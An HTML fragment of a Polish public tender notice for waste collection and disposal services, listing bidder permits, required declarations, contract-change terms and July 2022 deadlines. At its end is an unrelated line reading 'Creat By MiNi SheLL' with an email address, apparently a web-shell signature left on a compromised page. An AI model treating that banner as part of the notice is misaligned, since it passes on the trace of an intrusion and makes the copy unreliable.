<span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie wyznacza warunków<br/>w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów: Warunek ten zostanie spełniony, jeśli:<br/>a) Wykonawca przedłoży aktualne zezwolenia lub zezwolenie (decyzję) właściwych organów<br/>administracji publicznej na prowadzenie działalności gospodarczej w zakresie objętym<br/>przedmiotem zamówienia tj. odbioru, transportu, wywozu, zagospodarowania<br/>i unieszkodliwiania w zależności od kodów objętych przedmiotem zamówienia<br/>wymaganych zgodnie z wymogami ustawy z dnia 14 grudnia 2012 r. o odpadach<br/>(t.j. Dz.U. 2022 poz. 699 ze zm.) lub innych powszechnie obowiązujących przepisów;<br/>b) Wykonawca będzie wpisany do rejestru podmiotów wprowadzających produkty,<br/>produkty w opakowaniach i gospodarujących odpadami (w zakresie działu VII), o którym<br/>mowa w art. 49 ustawy o odpadach z dnia 14 grudnia 2012r. (t.j. Dz.U. 2022 poz. 699 ze<br/>zm.).<br/>W sytuacji składania oferty przez dwa lub więcej podmioty (Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia), warunek zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada ww.<br/>uprawnienia i zrealizuje usługi, do której realizacji te uprawnienia są wymagane.<br/>3) sytuacji ekonomicznej lub finansowej: Zamawiający nie wyznacza warunków w tym zakresie.<br/>4) zdolności technicznej lub zawodowej: Zamawiający nie wyznacza warunków w tym zakresie.<br/>2. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne<br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia, na podstawie art. 108 ust. 1 ustawy Pzp<br/>Wykonawca zobowiązany jest do złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia składa się zgodnie z wymogami określonymi w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>podmiotowych środków dowodowych, w wyznaczonym terminie, nie krótszym niż 5 dni od<br/>dnia wezwania, aktualnych na dzień ich złożenia. <br/>2. W celu potwierdzenia okoliczności, o których mowa w art. 112 ust. 2 pkt 2 ustawy Pzp<br/>w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>określonych w Rozdziale VII, Wykonawca przedłoży:<br/>a) wydaną przez właściwe organy aktualną decyzję / zezwolenie na prowadzenie działalności<br/>w zakresie przedmiotu zamówienia tj. odbioru, transportu, wywozu, zagospodarowania<br/>i unieszkodliwiania odpadów w zależności od kodów objętych przedmiotem zamówienia,<br/>zgodnie z obowiązującymi przepisami prawa tj. ustawy z dnia 14 grudnia 2012 r.<br/>o (t.j. Dz.U. 2022 poz. 699 ze zm.) lub innych powszechnie obowiązujących przepisów;<br/>b) dokument potwierdzający uzyskanie wpisu do rejestru BDO, tj. do rejestru podmiotów<br/>wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami<br/>(w zakresie rozdziału VII), o którym mowa w art. 49 ustawy o odpadach z dnia 14 grudnia<br/>2012r. (t.j. Dz.U. 2022 poz. 699 ze zm.).<br/>3. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może<br/>je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.<br/>4. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia, na podstawie art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest do złożenia<br/>oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez Zamawiającego.<br/>5. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa<br/>w niniejszym rozdziale składa się zgodnie z wymogami określonymi w Specyfikacji Warunków Zamówienia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty Wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 oraz art. 273 ust. 2<br/>ustawy Pzp w zakresie wskazanym przez Zamawiającego, stanowiące dowód potwierdzający<br/>brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu, odpowiednio na<br/>dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe<br/>środki dowodowe. Wzór oświadczenia stanowi załącznik nr 2 do SWZ.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie, o którym mowa w pkt 1, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu<br/>w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które dostawy wykonają ci poszczególni Wykonawcy. Wzór<br/>oświadczenia stanowi załącznik nr 3 do SWZ.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>5. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych<br/>dokumentów.<br/>6. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt. 5 jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów np. w treści Formularza<br/>ofertowego.<br/>7. Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt. 5 Zamawiający może<br/>żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie<br/>do reprezentowania Wykonawcy. Forma pełnomocnictwa została wskazana w rozdziale<br/>XIV (Sposób i termin składania ofert).<br/>8. Jeżeli Wykonawca nie złoży wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa,<br/>Zamawiający wezwie do ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich<br/>złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie<br/>postępowania.<br/>9. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa<br/>w SWZ, składa się w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym, w zakresie i w sposób określony w przepisach wydanych na<br/>podstawie art. 70 ustawy Pzp, zgodnie z wymogami określonymi w specyfikacji Warunków Zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 1,<br/>składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>dostawy wykonają ci poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego dla poszczególnych<br/>zadań, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 5<br/>do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp. oraz wskazanym we wzorze<br/>umowy, stanowiącym załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-12 14:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-12 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com